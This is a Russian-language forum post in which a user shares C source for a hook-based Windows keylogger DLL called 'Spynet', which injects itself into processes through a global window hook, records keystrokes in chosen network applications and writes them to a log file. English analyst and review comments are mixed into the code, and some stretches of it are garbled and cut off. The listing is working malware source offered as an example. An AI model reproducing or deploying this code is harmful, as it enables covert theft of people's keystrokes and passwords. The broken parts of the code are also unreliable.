Тема: Блог vladyx'и

  #117  
Старый 26.10.2013, 01:00
BlackH

Таких кейлоггеров уйма. На любой ЯП мона найти.
Кульного в нем мало. Хуков в нем нет, а если их и добавлять, то уже проще с нуля написать, ибо данный сорец работает на опросах клавы, а-ля: «нажата клавиша или нет?». Такое легко детектят аверы и различные антиспаи.
У кейлоггера на хуках все немного по-другому:


Код:
#include 
#include 
#define MAX 256 // who else loves 256? =)
//my macros
#define my_toLower(x)  ((x >= 'A') && (x = 'A') && (x "
,
"/?"
,
"\\|"
};
//does ABSOLUTELY NOTHING!!!
// Hook procedure that InstallHook() registers for WH_CALLWNDPROC.
// It examines none of its arguments and only forwards the call to the next
// hook in the chain. Per the author's comment on InstallHook(), the hook exists
// so that this DLL gets mapped into other processes, not to observe messages.
// Analyst note: a hook procedure that is a pure pass-through is a common sign
// that the hook is being used as a DLL-loading mechanism.
LRESULT CALLBACK DummyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
    // hInjectionHook is a file-scope handle declared outside the visible part of the listing.
    return CallNextHookEx(hInjectionHook,nCode,wParam,lParam);
}
//The Hook makes our Dll Injected into every process that has a Message Queue
//DRAWBACK : Console Programs are NOT hooked...
// Registers DummyProc as a WH_CALLWNDPROC hook and stores the handle in hInjectionHook.
// Returns TRUE when a hook handle is already recorded or registration succeeded,
// FALSE when SetWindowsHookEx returned NULL.
//
// Analyst note: the thread-id argument is 0 and the procedure lives in this module
// (g_hInstance), so the hook is not limited to one thread; Windows loads the DLL into
// the processes whose threads the hook applies to. For detection, a DLL registering a
// hook with thread id 0 whose callback does nothing is the behaviour to look for
// (keylogging via hooks is tracked as MITRE ATT&CK T1056.001).
BOOL WINAPI InstallHook()
{
    // Already installed in this process: report success without registering twice.
    if (hInjectionHook)
        return TRUE;
    hInjectionHook = SetWindowsHookEx(WH_CALLWNDPROC,DummyProc,g_hInstance,0);
    return (hInjectionHook != NULL);
}
//Plz Note The Keylogger does NOT Stop...
//By Uninstalling the Injection Hook, Spynet Will not inject future instances of processes
// Removes the WH_CALLWNDPROC hook recorded in hInjectionHook.
// Returns TRUE if no hook was recorded or the unhook succeeded; otherwise returns
// the FALSE result of UnhookWindowsHookEx and leaves the handle unchanged.
// This function does not touch hKLoggerHook, so a keyboard hook installed by
// InstallKeyLoggerHook() stays in place (see the author's note above this function).
BOOL WINAPI UninstallHook()
{
    if (!hInjectionHook)
        return TRUE; // no hook to unhook
    BOOL bRet = UnhookWindowsHookEx(hInjectionHook);
    // Clear the handle only on success so a failed unhook can be retried.
    if (bRet) hInjectionHook = NULL;
    return bRet;
}
// Writes the NUL-terminated string szData to the file handle g_hLogFile.
// The length comes from strlen(), so nothing after the first NUL byte is written.
// Returns the result of WriteFile (non-zero on success).
// The data is written as-is, so the log is plain text on disk.
// NOTE(review): neither szData nor g_hLogFile is validated here, and the
// byte count returned in dwTemp is never compared with the requested length.
BOOL AppendLog(char *szData)
{
    DWORD dwTemp; // receives the number of bytes written; not inspected
    return WriteFile(g_hLogFile,szData,strlen(szData),&dwTemp,0);
}
char getShiftChar(WPARAM wParam)
{
for
(
int
i=
0
;i
1
)
			{
switch
(wParam)
				{
case
VK_RETURN :
strcpy
(szKey,
"\r\n"
);
break
;
case
VK_SPACE:
strcpy
(szKey,
" "
);
break
;
case
VK_DELETE:
strcpy
(szKey,
"[DEL]"
);
break
;
case
VK_MENU:
strcpy
(szKey,
"[ALT]"
);
break
;
case
VK_CONTROL:
strcpy
(szKey,
"[CTL]"
);
break
;
case
VK_ESCAPE :
strcpy
(szKey,
"[ESC]"
);
break
;
case
VK_BACK:
strcpy
(szKey,
"[BSP]"
);
break
;
case
VK_TAB :
strcpy
(szKey,
"[TAB]"
);
break
;
case
VK_SHIFT :
strcpy
(szKey,
"[SFT]"
);
break
;
case
VK_CAPITAL :
strcpy
(szKey,
"[CPLK]"
);
break
;
case
VK_SCROLL :
strcpy
(szKey,
"[SRLK]"
);
break
;
default
:
AppendLog
(
"["
);
strcat
(szKey,
"]"
);
break
;
				}
			}
		}
AppendLog
(szKey);
	}
return
CallNextHookEx
(hInjectionHook,nCode,wParam,lParam);
}
// Registers KLogProc as a WH_KEYBOARD hook and stores the handle in hKLoggerHook.
// Returns TRUE when a handle is already recorded or registration succeeded,
// FALSE when SetWindowsHookEx returned NULL.
// KLogProc's signature is not visible in this listing; presumably it is the
// procedure whose body ends just above this function - confirm against the original file.
//
// Analyst note: as in InstallHook(), the thread-id argument is 0, so the hook is not
// scoped to a single thread. A WH_KEYBOARD hook registered this way from an injected DLL
// is the core keystroke-capture indicator in this sample (MITRE ATT&CK T1056.001).
BOOL InstallKeyLoggerHook()
{
    // Already installed in this process: do not register a second hook.
    if (hKLoggerHook)
        return TRUE;
    hKLoggerHook = SetWindowsHookEx(WH_KEYBOARD,KLogProc,g_hInstance,0);
    return (hKLoggerHook != NULL);
}
// Removes the WH_KEYBOARD hook recorded in hKLoggerHook.
// Returns TRUE if no hook was recorded or the unhook succeeded; otherwise returns
// the FALSE result of UnhookWindowsHookEx and keeps the handle.
// In the visible code this is called only from DllMain on DLL_PROCESS_DETACH.
BOOL UninstallKeyLoggerHook()
{
    if (!hKLoggerHook)
        return TRUE; // no hook to unhook
    BOOL bRet = UnhookWindowsHookEx(hKLoggerHook);
    // Clear the handle only when the hook was really removed.
    if (bRet) hKLoggerHook = NULL;
    return bRet;
}
// Builds a session marker line and appends it to the log through AppendLog().
// bBegin != 0 -> "\r\nSpynet Session Begin: " + time + date + "\r\nUser : " + user name
// bBegin == 0 -> "\r\nSpynet Session End: "   + time + date
//
// Analyst note: the fixed strings "Spynet Session Begin: " / "Spynet Session End: "
// and "User : " are written verbatim, so they can serve as content indicators when
// hunting for log files produced by this sample.
// NOTE(review): every copy into szBuf/szTemp is unbounded (strcpy/strcat/wsprintf);
// the sizes are MAX*2 and MAX bytes, with MAX defined as 256 at the top of the listing.
void logHeader(BOOL bBegin)
{
    char szBuf[MAX * 2],szTemp[MAX];
    SYSTEMTIME systime;
    DWORD dwTemp;
    GetLocalTime(&systime); // local time, not UTC
    if (bBegin)
        strcpy(szBuf,"\r\nSpynet Session Begin: ");
    else
        strcpy(szBuf,"\r\nSpynet Session End: ");
    // hour:minute, hour not zero-padded, followed by ", "
    wsprintf(szTemp,"%d:%02d, ",systime.wHour,systime.wMinute);
    strcat(szBuf,szTemp);
    // month/day/year, none of the fields zero-padded
    wsprintf(szTemp,"%d/%d/%d",systime.wMonth,systime.wDay,systime.wYear);
    strcat(szBuf,szTemp);
    if (bBegin)
    {
        strcat(szBuf,"\r\nUser : ");
        dwTemp = MAX; // capacity of szTemp passed to GetUserName
        // The return value is not checked; if the call fails, szTemp may still hold
        // the date text written above, and that is what gets appended.
        GetUserName(szTemp,&dwTemp);
        strcat(szBuf,szTemp);
    }
    AppendLog(szBuf);
}
// Returns a pointer into Path at the character following the last backslash,
// or Path itself when it contains no backslash. Only '\\' is treated as a
// separator; forward slashes are not. Path must be NUL-terminated; no copy is made.
char * GetFileName(char *Path)
{
    char *leaf = Path;
    char *cursor = Path;

    while (*cursor != 0) {
        if (*cursor == '\\') {
            // Remember the position just past the most recent separator.
            leaf = cursor + 1;
        }
        cursor++;
    }
    return leaf;
}
//logs headers for log files (time,date,logged in username)
// Builds the log path in g_logPath, opens (or creates) the file into g_hLogFile,
// seeks to its end and writes the session-begin header via logHeader(TRUE).
// The path is: <current directory of the host process> + "\" + <file name of g_exePath> + ".log".
//
// Analyst note: the on-disk artefact is therefore a file named after the host
// executable with ".log" appended, located in whatever directory is current for that
// process when the DLL is attached. The file is opened with OPEN_ALWAYS and appended
// to, so successive sessions accumulate in one file.
// NOTE(review): the success test below compares against INVALID_HANDLE_VALUE, but the
// return statement compares against NULL, so as written the function reports TRUE
// even when CreateFile failed.
// NOTE(review): GetCurrentDirectory's result is not checked and the strcat calls are
// unbounded; g_logPath's size is declared outside the visible part of the listing.
BOOL PrepareLogFile()
{
    //GetWindowsDirectory(g_logPath,MAX_PATH); //or GetSystemDirectory() (recommended)
    GetCurrentDirectory(MAX_PATH,g_logPath); // log file is created in the process's current directory
    // Append a separator only if the directory does not already end with one.
    if (g_logPath[strlen(g_logPath) - 1] != '\\')
        strcat(g_logPath,"\\");
    strcat(g_logPath,GetFileName(g_exePath)); // log file will be "iexplore.exe.log"
    strcat(g_logPath,".log");

    // Share mode is passed as NULL (0): no sharing while this handle is open.
    g_hLogFile = CreateFile(g_logPath,GENERIC_WRITE,NULL,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    //On Release : Add Hidden Attribute.
    if (g_hLogFile != INVALID_HANDLE_VALUE)
    {
        SetFilePointer(g_hLogFile,0,0,FILE_END); // append after existing content
        logHeader(TRUE);
    }
    return (g_hLogFile != NULL);
}
// DLL entry point.
//
// DLL_PROCESS_ATTACH:
//   - records the module handle and the paths of the host executable and of this DLL;
//   - lower-cases the host executable path;
//   - when built with AUTOHOOK and hInjectionHook is still NULL, installs the
//     WH_CALLWNDPROC hook and returns TRUE;
//   - otherwise searches the host path for each entry of netAppList; on the first
//     substring match it opens the log and installs the keyboard hook, returning
//     the combined result;
//   - returns FALSE when nothing matched, which makes the load of this DLL fail
//     in that process.
// DLL_PROCESS_DETACH:
//   - removes the keyboard hook, writes the session-end header and closes the log.
//
// Analyst note: logging is gated on the host process name, so the DLL stays resident
// only in processes that match netAppList; the list itself and UBOUND_NETAPPLIST are
// declared outside the visible part of the listing. Hook registration and file
// creation are performed directly from DllMain.
BOOL APIENTRY DllMain(HINSTANCE hInstance,DWORD dwReason,LPVOID lpvReserved)
{
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        g_hInstance = hInstance;
        GetModuleFileName(0,g_exePath,MAX_PATH);         // path of the host executable
        GetModuleFileName(hInstance,g_dllPath,MAX_PATH); // path of this DLL
        // _strlwr lower-cases g_exePath in place and returns it, so the strcpy
        // copies the buffer onto itself; the visible effect is the lower-casing.
        strcpy(g_exePath,_strlwr(g_exePath));
#if AUTOHOOK
        //first load will call injection and successfull load inspite of the process we are in...
        if (hInjectionHook == NULL)
        {
            InstallHook();
            return TRUE;
        }
#endif
        //instead of hardcoding the list a ".ini"
        //file can be used to dynamically configure spynet
        int i;
        for (i=0;i<UBOUND_NETAPPLIST;i++)
        {
            // Substring match against the lower-cased host path.
            if (strstr(g_exePath,netAppList[i]))
            {
                // Short-circuit: the keyboard hook is installed only if PrepareLogFile() reported success.
                BOOL bRet = PrepareLogFile() && InstallKeyLoggerHook();
                return bRet;
            }
        }
        //now, normally we LoadLibrary ourself to increase the reference count
        //so that we won't be "free-ed" once the original injector terminates
        //BUT, since we have established a WH_KEYBOARD hook
        // in the process so we won't be unloaded till we have the keyboard hook...
        return FALSE;
        break; // unreachable after the return above
    case DLL_PROCESS_DETACH:
        UninstallKeyLoggerHook();
        // NOTE(review): tests for non-zero only; INVALID_HANDLE_VALUE also passes this check.
        if (g_hLogFile)
        {
            logHeader(FALSE);
            CloseHandle(g_hLogFile);
        }
        break;
    }
    return TRUE;
}
//TODO :
// Add Hot Key to Stop Keylogging...
// Evil stuff i haven't thought of yet...
// Email the Log File...
Вот только у всей этой кучи паблика одна и та же проблема. Попробуй поработай, например, с испанской, итальянской, турецкой локалью. Обломчег)
 